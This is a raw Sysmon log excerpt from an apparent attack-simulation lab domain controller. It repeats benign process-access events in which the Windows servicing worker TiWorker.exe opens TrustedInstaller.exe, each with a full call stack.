13:30:30.154{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.138{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.138{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.138{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.138{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.123{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.123{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.123{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.107{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.092{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.092{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.092{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.092{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.076{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.076{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.076{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.076{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.076{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 